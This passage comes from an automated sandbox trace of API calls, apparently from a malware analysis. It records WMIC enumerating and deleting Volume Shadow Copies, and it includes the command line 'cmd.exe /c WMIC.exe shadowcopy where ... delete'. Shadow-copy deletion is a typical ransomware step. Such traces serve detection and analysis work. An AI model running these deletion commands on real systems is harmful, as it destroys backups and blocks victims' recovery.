dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0113.725] lstrlenW (lpString="ASSOC") returned 5 [0113.725] lstrlenW (lpString="delete") returned 6 [0113.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0113.725] lstrlenW (lpString="CREATE") returned 6 [0113.725] lstrlenW (lpString="delete") returned 6 [0113.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0113.725] lstrlenW (lpString="DELETE") returned 6 [0113.725] lstrlenW (lpString="delete") returned 6 [0113.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0113.725] malloc (_Size=0x18) returned 0x15cc00 [0113.725] lstrlenA (lpString="") returned 0 [0113.725] malloc (_Size=0x2) returned 0x38dfb0 [0113.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x38dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0113.725] free (_Block=0x38dfb0) [0113.725] malloc (_Size=0x18) returned 0x15cca0 [0113.726] lstrlenA (lpString="") returned 0 [0113.726] malloc (_Size=0x2) returned 0x38dfb0 [0113.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x38dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0113.726] free (_Block=0x38dfb0) [0113.726] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0113.726] malloc (_Size=0x3e) returned 0x15d080 [0113.726] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0113.726] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0113.726] malloc (_Size=0x18) returned 0x15cba0 [0113.726] free (_Block=0x15cca0) [0113.726] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0113.726] lstrlenW (lpString="FROM") returned 4 [0113.726] lstrlenW (lpString="*") returned 1 [0113.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0113.726] malloc (_Size=0x18) returned 0x15cca0 [0113.726] free (_Block=0x15cba0) [0113.726] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0113.726] lstrlenW (lpString="FROM") returned 4 [0113.726] lstrlenW (lpString="from") returned 4 [0113.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0113.726] malloc (_Size=0x18) returned 0x15cba0 [0113.726] free (_Block=0x15cca0) [0113.726] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0113.726] malloc (_Size=0x18) returned 0x15cca0 [0113.726] free (_Block=0x15cba0) [0113.727] free (_Block=0x15d080) [0113.727] malloc (_Size=0x18) returned 0x15cba0 [0113.727] malloc (_Size=0x18) returned 0x15cc20 [0113.727] malloc (_Size=0x18) returned 0x15cc40 [0113.727] malloc (_Size=0x18) returned 0x15cc60 [0113.727] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0113.727] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0113.727] malloc (_Size=0x18) returned 0x15cc80 [0113.727] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0113.727] SysStringLen (param_1=" WHERE ") returned 0x7 [0113.727] malloc (_Size=0x18) returned 0x15ccc0 [0113.727] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0113.727] SysStringLen (param_1="ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 0x2b [0113.727] free (_Block=0x15cc00) [0113.727] free (_Block=0x15cc80) [0113.728] free (_Block=0x15cc60) [0113.728] free (_Block=0x15cc40) [0113.728] free (_Block=0x15cc20) [0113.728] free (_Block=0x15cba0) [0113.728] ??0CHString@@QEAA@XZ () returned 0x1ef970 [0113.728] GetCurrentThreadId () returned 0xb10 [0113.728] malloc (_Size=0x18) returned 0x15cba0 [0113.728] malloc (_Size=0x18) returned 0x15cc20 [0113.728] malloc (_Size=0x18) returned 0x15cc40 [0113.728] malloc (_Size=0x18) returned 0x15cc60 [0113.728] malloc (_Size=0x18) returned 0x15cc80 [0113.728] SysStringLen (param_1="\\\\") returned 0x2 [0113.728] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0113.728] malloc (_Size=0x18) returned 0x15cc00 [0113.728] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0113.728] SysStringLen (param_1="\\") returned 0x1 [0113.728] malloc (_Size=0x18) returned 0x15cce0 [0113.728] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0113.728] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0113.728] free (_Block=0x15cc00) [0113.728] free (_Block=0x15cc80) [0113.728] free (_Block=0x15cc60) [0113.729] free (_Block=0x15cc40) [0113.729] free (_Block=0x15cc20) [0113.729] free (_Block=0x15cba0) [0113.729] malloc (_Size=0x18) returned 0x15cba0 [0113.729] malloc (_Size=0x18) returned 0x15cc20 [0113.729] malloc (_Size=0x18) returned 0x15cc40 [0113.729] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ce1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4d29d0 | out: ppNamespace=0xff4d29d0*=0x1cf3c18) returned 0x0 [0113.733] free (_Block=0x15cc40) [0113.733] free (_Block=0x15cc20) [0113.733] free (_Block=0x15cba0) [0113.733] CoSetProxyBlanket (pProxy=0x1cf3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0113.733] free (_Block=0x15cce0) [0113.733] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.733] ??0CHString@@QEAA@XZ () returned 0x1ef8c0 [0113.733] GetCurrentThreadId () returned 0xb10 [0113.733] malloc (_Size=0x18) returned 0x15cce0 [0113.733] lstrlenA (lpString="") returned 0 [0113.733] malloc (_Size=0x2) returned 0x38dfb0 [0113.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x38dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0113.733] free (_Block=0x38dfb0) [0113.733] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 0x50 [0113.733] SysStringLen (param_1="") returned 0x0 [0113.733] free (_Block=0x15cce0) [0113.733] malloc (_Size=0x18) returned 0x15cce0 [0113.734] IWbemServices:ExecQuery (in: This=0x1cf3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'", lFlags=0, pCtx=0x0, ppEnum=0x1ef8c8 | out: ppEnum=0x1ef8c8*=0x1cf3d18) returned 0x0 [0113.766] free (_Block=0x15cce0) [0113.766] CoSetProxyBlanket (pProxy=0x1cf3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0113.769] IEnumWbemClassObject:Next (in: This=0x1cf3d18, lTimeout=-1, uCount=0x1, apObjects=0x1ef8d0, puReturned=0x1ef8e0 | out: apObjects=0x1ef8d0*=0x1cf3d80, puReturned=0x1ef8e0*=0x1) returned 0x0 [0113.770] malloc (_Size=0x18) returned 0x15cce0 [0113.770] IWbemClassObject:Get (in: This=0x1cf3d80, wszName="__PATH", lFlags=0, pVal=0x1ef8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.770] free (_Block=0x15cce0) [0113.770] malloc (_Size=0x800) returned 0x15d080 [0113.770] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x15d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0113.770] FormatMessageW (in: dwFlags=0x2500, lpSource=0x15d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1ef818, nSize=0x0, Arguments=0x1ef828 | out: lpBuffer="뚐0") returned 0x67 [0113.770] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0113.770] malloc (_Size=0x68) returned 0x15d890 [0113.770] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x15d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0113.770] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff4d2ab0 [0113.770] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0113.771] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0113.771] free (_Block=0x15d890) [0113.771] free (_Block=0x15d080) [0113.771] LocalFree (hMem=0x30b690) returned 0x0 [0113.771] IWbemServices:DeleteInstance (in: This=0x1cf3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0114.707] IUnknown:Release (This=0x1cf3d80) returned 0x0 [0114.707] malloc (_Size=0x800) returned 0x15d080 [0114.707] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x15d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0114.707] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0114.707] malloc (_Size=0x20) returned 0x15cef0 [0114.707] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x15cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0114.707] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff4d2ab0 [0114.707] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0114.708] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0114.708] free (_Block=0x15cef0) [0114.708] free (_Block=0x15d080) [0114.708] IEnumWbemClassObject:Next (in: This=0x1cf3d18, lTimeout=-1, uCount=0x1, apObjects=0x1ef8d0, puReturned=0x1ef8e0 | out: apObjects=0x1ef8d0*=0x0, puReturned=0x1ef8e0*=0x0) returned 0x1 [0114.709] IUnknown:Release (This=0x1cf3d18) returned 0x0 [0114.710] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0114.710] free (_Block=0x15cca0) [0114.710] free (_Block=0x15ccc0) [0114.710] GetCurrentThreadId () returned 0xb10 [0114.710] ??0CHString@@QEAA@PEBG@Z () returned 0x1efaa8 [0114.710] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1efaa8 [0114.711] lstrlenW (lpString="LIST") returned 4 [0114.711] lstrlenW (lpString="delete") returned 6 [0114.711] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0114.711] lstrlenW (lpString="ASSOC") returned 5 [0114.711] lstrlenW (lpString="delete") returned 6 [0114.711] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0114.711] lstrlenW (lpString="GET") returned 3 [0114.711] lstrlenW (lpString="delete") returned 6 [0114.711] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0114.711] ??1CHString@@QEAA@XZ () returned 0x38583501 [0114.711] WbemLocator:IUnknown:Release (This=0x1cf3c18) returned 0x0 [0114.711] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0114.712] _kbhit () returned 0x0 [0114.712] free (_Block=0x156f20) [0114.712] free (_Block=0x15cac0) [0114.712] free (_Block=0x15caa0) [0114.712] free (_Block=0x15ca80) [0114.712] free (_Block=0x15ca60) [0114.712] free (_Block=0x1570a0) [0114.713] free (_Block=0x15cb40) [0114.713] free (_Block=0x1585c0) [0114.713] free (_Block=0x15d020) [0114.713] free (_Block=0x15cbc0) [0114.713] free (_Block=0x15cfa0) [0114.713] free (_Block=0x15cae0) [0114.713] free (_Block=0x15cbe0) [0114.713] free (_Block=0x157140) [0114.713] free (_Block=0x156e00) [0114.713] free (_Block=0x15cff0) [0114.713] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0114.713] free (_Block=0x15ce20) [0114.713] free (_Block=0x15cb00) [0114.713] free (_Block=0x15cb20) [0114.713] free (_Block=0x15cf30) [0114.713] free (_Block=0x15cb60) [0114.713] free (_Block=0x157ee0) [0114.713] free (_Block=0x157f30) [0114.713] free (_Block=0x157f80) [0114.713] free (_Block=0x15cb80) [0114.713] free (_Block=0x156a20) [0114.713] free (_Block=0x156de0) [0114.713] free (_Block=0x158040) [0114.713] free (_Block=0x156dc0) [0114.713] free (_Block=0x158000) [0114.714] free (_Block=0x156d60) [0114.714] free (_Block=0x156d80) [0114.714] free (_Block=0x156c40) [0114.714] free (_Block=0x156c60) [0114.714] free (_Block=0x156be0) [0114.714] free (_Block=0x156c00) [0114.714] free (_Block=0x156ca0) [0114.714] free (_Block=0x156cc0) [0114.714] free (_Block=0x156d00) [0114.714] free (_Block=0x156d20) [0114.714] free (_Block=0x156b20) [0114.714] free (_Block=0x156b40) [0114.714] free (_Block=0x156ac0) [0114.714] free (_Block=0x156ae0) [0114.714] free (_Block=0x156b80) [0114.714] free (_Block=0x156ba0) [0114.714] free (_Block=0x156a60) [0114.714] free (_Block=0x156a80) [0114.714] free (_Block=0x1569d0) [0114.714] free (_Block=0x1569a0) [0114.714] free (_Block=0x156e90) [0114.714] WbemLocator:IUnknown:Release (This=0x1ce1390) returned 0x2 [0114.714] WbemLocator:IUnknown:Release (This=0x1cf3b28) returned 0x0 [0114.715] WbemLocator:IUnknown:Release (This=0x1cf3a98) returned 0x0 [0114.715] WbemLocator:IUnknown:Release (This=0x1ce1390) returned 0x1 [0114.715] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0114.715] WbemLocator:IUnknown:Release (This=0x1ce1390) returned 0x0 [0114.715] free (_Block=0x15c9e0) [0114.715] free (_Block=0x15ca00) [0114.715] free (_Block=0x158540) [0114.715] free (_Block=0x15ca20) [0114.716] free (_Block=0x15ca40) [0114.716] free (_Block=0x158580) [0114.716] free (_Block=0x15c860) [0114.716] free (_Block=0x15c880) [0114.716] free (_Block=0x1583c0) [0114.716] free (_Block=0x15c8a0) [0114.716] free (_Block=0x15c8c0) [0114.716] free (_Block=0x158400) [0114.716] free (_Block=0x15c7e0) [0114.716] free (_Block=0x15c800) [0114.716] free (_Block=0x158340) [0114.716] free (_Block=0x15c820) [0114.716] free (_Block=0x15c840) [0114.716] free (_Block=0x158380) [0114.716] free (_Block=0x15c960) [0114.716] free (_Block=0x15c980) [0114.716] free (_Block=0x1584c0) [0114.716] free (_Block=0x15c9a0) [0114.716] free (_Block=0x15c9c0) [0114.716] free (_Block=0x158500) [0114.717] free (_Block=0x15c760) [0114.717] free (_Block=0x15c780) [0114.717] free (_Block=0x1582c0) [0114.717] free (_Block=0x15c7a0) [0114.717] free (_Block=0x15c7c0) [0114.717] free (_Block=0x158300) [0114.717] free (_Block=0x15c8e0) [0114.717] free (_Block=0x15c900) [0114.717] free (_Block=0x158440) [0114.717] free (_Block=0x15c920) [0114.717] free (_Block=0x15c940) [0114.717] free (_Block=0x158480) [0114.717] free (_Block=0x15c6a0) [0114.717] free (_Block=0x15c6c0) [0114.717] free (_Block=0x158200) [0114.718] free (_Block=0x15c560) [0114.718] free (_Block=0x15c580) [0114.718] free (_Block=0x1580c0) [0114.718] free (_Block=0x156e50) [0114.718] free (_Block=0x156e70) [0114.718] free (_Block=0x158080) [0114.718] free (_Block=0x15c5e0) [0114.718] free (_Block=0x15c600) [0114.718] free (_Block=0x158140) [0114.718] free (_Block=0x15c6e0) [0114.718] free (_Block=0x15c700) [0114.718] free (_Block=0x158240) [0114.718] free (_Block=0x15c5a0) [0114.718] free (_Block=0x15c5c0) [0114.719] free (_Block=0x158100) [0114.719] free (_Block=0x15c620) [0114.719] free (_Block=0x15c640) [0114.719] free (_Block=0x158180) [0114.719] free (_Block=0x15c660) [0114.719] free (_Block=0x15c680) [0114.719] free (_Block=0x1581c0) [0114.719] free (_Block=0x15c720) [0114.719] free (_Block=0x15c740) [0114.719] free (_Block=0x158280) [0114.719] CoUninitialize () [0114.745] exit (_Code=0) [0114.745] free (_Block=0x15cd30) [0114.745] free (_Block=0x157ea0) [0114.745] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0114.745] free (_Block=0x156f40) [0114.745] free (_Block=0x156a40) [0114.745] free (_Block=0x157e60) [0114.745] free (_Block=0x157e20) [0114.745] free (_Block=0x157dd0) [0114.745] free (_Block=0x157d90) [0114.745] free (_Block=0x157d30) [0114.745] free (_Block=0x155a90) [0114.745] free (_Block=0x155a50) [0114.745] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0114.745] free (_Block=0x15cec0) Thread: id = 217 os_tid = 0x86c Thread: id = 218 os_tid = 0xa1c Thread: id = 219 os_tid = 0xaf8 Thread: id = 220 os_tid = 0x84c Thread: id = 221 os_tid = 0x6d8 Process: id = "40" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x1d321000" os_pid = "0xb5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 223 os_tid = 0x3a4 [0114.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9d0 | out: lpSystemTimeAsFileTime=0x16f9d0*(dwLowDateTime=0x4c09eed0, dwHighDateTime=0x1d68245)) [0114.879] GetCurrentProcessId () returned 0xb5c [0114.879] GetCurrentThreadId () returned 0x3a4 [0114.879] GetTickCount () returned 0x115254d [0114.879] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9d8 | out: lpPerformanceCount=0x16f9d8*=23477195496) returned 1 [0114.885] GetModuleHandleW (lpModuleName=0x0) returned 0x4aa20000 [0114.885] __set_app_type (_Type=0x1) [0114.885] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa47810) returned 0x0 [0114.885] __getmainargs (in: _Argc=0x4aa6a608, _Argv=0x4aa6a618, _Env=0x4aa6a610, _DoWildCard=0, _StartInfo=0x4aa4e0f4 | out: _Argc=0x4aa6a608, _Argv=0x4aa6a618, _Env=0x4aa6a610) returned 0 [0114.886] GetCurrentThreadId () returned 0x3a4 [0114.886] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3a4) returned 0x3c [0114.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.886] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0114.886] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.887] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.887] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f968 | out: phkResult=0x16f968*=0x0) returned 0x2 [0114.887] VirtualQuery (in: lpAddress=0x16f950, lpBuffer=0x16f8d0, dwLength=0x30 | out: lpBuffer=0x16f8d0*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.887] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f8d0, dwLength=0x30 | out: lpBuffer=0x16f8d0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.887] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f8d0, dwLength=0x30 | out: lpBuffer=0x16f8d0*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.887] VirtualQuery (in: lpAddress=0x74000, lpBuffer=0x16f8d0, dwLength=0x30 | out: lpBuffer=0x16f8d0*(BaseAddress=0x74000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.887] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f8d0, dwLength=0x30 | out: lpBuffer=0x16f8d0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0114.887] GetConsoleOutputCP () returned 0x1b5 [0114.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa5bfe0 | out: lpCPInfo=0x4aa5bfe0) returned 1 [0114.888] SetConsoleCtrlHandler (HandlerRoutine=0x4aa43184, Add=1) returned 1 [0114.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.888] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa4e194 | out: lpMode=0x4aa4e194) returned 1 [0114.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.889] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.889] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa4e198 | out: lpMode=0x4aa4e198) returned 1 [0114.889] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.890] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.890] GetEnvironmentStringsW () returned 0x2e8b90* [0114.890] GetProcessHeap () returned 0x2d0000 [0114.890] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2e9620 [0114.890] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0114.890] GetProcessHeap () returned 0x2d0000 [0114.890] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8) returned 0x2e8a10 [0114.890] GetEnvironmentStringsW () returned 0x2e8b90* [0114.890] GetProcessHeap () returned 0x2d0000 [0114.890] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2ea0b0 [0114.891] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0114.891] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e828 | out: phkResult=0x16e828*=0x44) returned 0x0 [0114.891] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x0, lpData=0x16e840*=0x18, lpcbData=0x16e824*=0x1000) returned 0x2 [0114.891] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x4, lpData=0x16e840*=0x1, lpcbData=0x16e824*=0x4) returned 0x0 [0114.891] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x0, lpData=0x16e840*=0x1, lpcbData=0x16e824*=0x1000) returned 0x2 [0114.891] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x4, lpData=0x16e840*=0x0, lpcbData=0x16e824*=0x4) returned 0x0 [0114.891] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x4, lpData=0x16e840*=0x40, lpcbData=0x16e824*=0x4) returned 0x0 [0114.891] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x4, lpData=0x16e840*=0x40, lpcbData=0x16e824*=0x4) returned 0x0 [0114.891] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x0, lpData=0x16e840*=0x40, lpcbData=0x16e824*=0x1000) returned 0x2 [0114.891] RegCloseKey (hKey=0x44) returned 0x0 [0114.891] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e828 | out: phkResult=0x16e828*=0x44) returned 0x0 [0114.891] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x0, lpData=0x16e840*=0x40, lpcbData=0x16e824*=0x1000) returned 0x2 [0114.892] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x4, lpData=0x16e840*=0x1, lpcbData=0x16e824*=0x4) returned 0x0 [0114.892] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x0, lpData=0x16e840*=0x1, 